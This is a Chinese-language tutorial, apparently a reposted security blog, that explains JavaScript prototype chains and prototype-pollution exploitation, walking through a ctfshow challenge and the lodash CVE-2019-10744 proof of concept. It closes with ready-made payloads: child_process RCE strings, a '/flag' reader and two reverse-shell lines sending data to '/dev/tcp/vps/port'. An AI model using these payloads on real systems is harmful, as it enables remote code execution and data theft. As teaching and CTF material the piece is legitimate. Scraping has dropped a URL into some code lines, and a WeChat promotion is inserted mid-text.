1.JS原型和繼承機制
0> 原型及其搜索機制
-
NodeJS原型機制,比較官方的定義:
我們創建的每個函式都有一個 prototype(原型)屬性,這個屬性是一個指標,指向一個物件,
而這個物件的用途是包含可以由特定型別的所有實體共享的屬性和方法
設計原型的初衷無非是對于每個實體物件,其擁有的共同屬性沒必要對每個物件實體再分配一片記憶體來存放這個屬性,而可以上升到所有物件共享這個屬性,而這個屬性的物體在記憶體中也僅僅只有一份,
而原型機制恰好滿足這種需求,
打個不太恰當的比喻,對于每個物件,都有其原型物件作為共享倉庫,共享倉庫中有屬性和方法供生產每個物件實體時使用
1> 原型鏈和繼承
-
原型鏈
原型鏈是在原型上實作繼承的一種形式
舉個例子:
function Father(){
this.name = "father";
this.age = 66;
}
?
function Son(){
this.name = "son";
}
?
var father1 = new Father();
?
Son.prototype = father1;
?
var son1 = new Son();
?
console.log(son1);
console.log(son1.__proto__);
console.log(son1.__proto__.__proto__);
console.log(son1.__proto__.__proto__.__proto__);
console.log(son1.__proto__.__proto__.__proto__.__proto__);
?
?
/*
Father { name: 'son' }
Father { name: 'father', age: 66 }
{}
[Object: null prototype] {}
null
*/
?整個的原型繼承鏈如下:
-
關于原型搜索機制:
1)搜索當前實體屬性
2)搜索當前實體的原型屬性
3)迭代搜索直至null
【----幫助網安學習,以下所有學習資料免費領!加vx:yj009991,備注 “博客園” 獲取!】
① 網安學習成長路徑思維導圖
② 60+網安經典常用工具包
③ 100+SRC漏洞分析報告
④ 150+網安攻防實戰技術電子書
⑤ 最權威CISSP 認證考試指南+題庫
⑥ 超1800頁CTF實戰技巧手冊
⑦ 最新網安大廠面試題合集(含答案)
⑧ APP客戶端安全檢測指南(安卓+IOS)
在上面的例子中
console.log(son1.name);
console.log(son1.age);
/*
son
66
*/2> 內置物件的原型
這個也是多級原型鏈污染的基礎
拿一張業內很經典的圖來看看
2.姿勢利用
1>利用原型污染進行RCE
global.process.mainModule.constructor._load('child_process').execSync('calc')
2>多級污染
在ctfshow Web340中有這么一題:
/* login.js */
var user = new function(){
this.userinfo = new function(){
this.isVIP = false;
this.isAdmin = false;
this.isAuthor = false;
};
}
utils.copy(user.userinfo,req.body);
if(user.userinfo.isAdmin){
res.end(flag);
}由于Function原型物件的原型也是Object的原型,即
user --(__proto__)--> Function.prototype --(__proto__)--> Object.prototype
那么就可以通過這個進行多級污染,payload為如下形式:
{
"__proto__":{
"__proto__":{
attack_code
}
}
}3>Lodash模塊的原型鏈污染(以lodash.defaultsDeep(CVE-2019-10744)為例,進行CVE復現)
lodash版本 < 4.17.12
CVE-2019-10744:在低版本中的lodash.defaultDeep函式中,Object物件可以被原型鏈污染,從而可以配合其他漏洞,
看下官方樣例PoC的除錯程序:
const lodash = require('lodash');
const payload = '{"constructor": {"prototype": {"whoami": "hack"}}}'
?
function check() {
lodash.defaultsDeep({}, JSON.parse(payload));
if (({})['whoami'] === "hack") {
console.log(`Vulnerable to Prototype Pollution via ${payload}`);
console.log(Object.prototype);
}
}
?
check();開始除錯:
在lodash中,baseRest是一個輔助函式,用于幫助創建一個接受可變數量引數的函式,所以主體邏輯為,而這段匿名函式也將為func的函式的函式體
args.push(undefined, customDefaultsMerge);
return apply(mergeWith, undefined, args);
查看overRest
在變數監聽中可以發現,傳入的引數整合成一個引數物件args
繼續往下return apply
到apply后進入,是個使用switch并且根據引數個數作為依據
發現使用了call,這里可能是個進行原型鏈繼承的可利用點,
(而這種技術稱為借用建構式,其思想就是通過子類建構式中呼叫超類建構式完成原型鏈繼承)
function Super(){}
function Sub(){
Super.call(this); // 繼承
}然后apply中回傳至剛才的匿名函式體中(此時剛執行完baseRest(func)),其中customDefaultMerge為merge的宣告方式
繼續深入,由上可知apply(func=mergeWith,thisArg=undefined,args=Array[4])
基于start的計算機制,不難得知undefined是作為占位符,使得start向后移動
繼續除錯,在NodeJS中,普通函式中呼叫this等同于呼叫全域物件global
將assigner視為合并的一個黑盒函式即可,至此完成原型鏈污染,
Question: 注意到PoC中的
lodash.defaultsDeep({}, JSON.parse(payload));是要求先傳入一個object實體的(此處為{})所以還是具體分析一下合并的程序(來看下
assigner的一些底層實作)注意:通常而言,合并需要考慮深淺拷貝的問題
/*baseMerge*/
function baseMerge(object, source, srcIndex, customizer, stack) {
if (object === source) { // 優化判斷是否為同一物件,是則直接回傳
return;
}
// 遍歷source的屬性,選擇深淺復制
baseFor(source, function(srcValue, key) {
if (isObject(srcValue)) {
stack || (stack = new Stack);
baseMergeDeep(object, source, key, srcIndex, baseMerge, customizer, stack);
}
else {
var newValue = https://www.cnblogs.com/hetianlab/archive/2023/05/05/customizer
? customizer(safeGet(object, key), srcValue, (key +''), object, source, stack)
: undefined;
?
if (newValue =https://www.cnblogs.com/hetianlab/archive/2023/05/05/== undefined) {
newValue = srcValue;
}
assignMergeValue(object, key, newValue);
}
}, keysIn);
} var baseFor = createBaseFor(); function createBaseFor(fromRight) { // fromRight選擇從哪端開始遍歷
return function(object, iteratee, keysFunc) {
var index = -1,
iterable = Object(object),
props = keysFunc(object),
length = props.length;
?
while (length--) {
var key = props[fromRight ? length : ++index];
if (iteratee(iterable[key], key, iterable) === false) { // 這里的iteratee即為baseFor中的匿名函式
break;
}
}
return object;
};
}
?那我就再除錯一下,在iteratee中(即匿名函式中),若為物件,則選擇深拷貝,
原來在4.17.12之前的版本也是有waf的,只是比較弱,
回歸正題,在customizer之后便產生了合并
所以,為了更好地觀察,我將{}替換成[](Array物件實體)
重新開始除錯到此處并進入,發現這是一個迭代合并的程序,先判斷是否都為物件,如果是的話,則會進行壓堆疊然后開始淺拷貝合并,
這是在生成屬性時需要設定的四種資料屬性
回歸正題,發現只能寫入Array的原型
再驗證一下
const lodash = require('lodash');
const payload = '{"constructor": {"prototype": {"whoami": "hack"}}}'
?
var object = new Object();
?
function check() {
// JSON.parse(payload)之后是一個JS物件
lodash.defaultsDeep([],JSON.parse(payload));
if (({})['whoami'] === "hack") {
console.log(`Vulnerable to Prototype Pollution via ${payload}`);
console.log(Object.prototype);
}
}
?
check();
?
console.log(Array.prototype);
所以說需要直接傳入一個Object的實體,
官方修復,直接上waf:檢測JSON中的payload中的key值
此處對比一下lodash4.17.12之前的版本,key值過濾得更為嚴格
總結一下,CVE-2019-10744可用的payload
# 反彈shell
{"constructor":{"prototype":
{"outputFunctionName":"a=1;process.mainModule.require('child_process').exec('bash -c \"echo $FLAG>/dev/tcp/vps/port \"')//"}}}
?
# RCE
// 對于某個object實體
{"__proto__":{"outputFunctionName":"a=1;return global.process.mainModule.constructor._load('child_process').execSync('cat /flag')//"}}
?
# 反彈shell
{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/vps/port 0>&1\"');var __tmp2"}}更多網安技能的在線實操練習,請點擊這里>>
合天智匯:合天網路靶場、網安實戰虛擬環境轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/551753.html
標籤:其他
下一篇:返回列表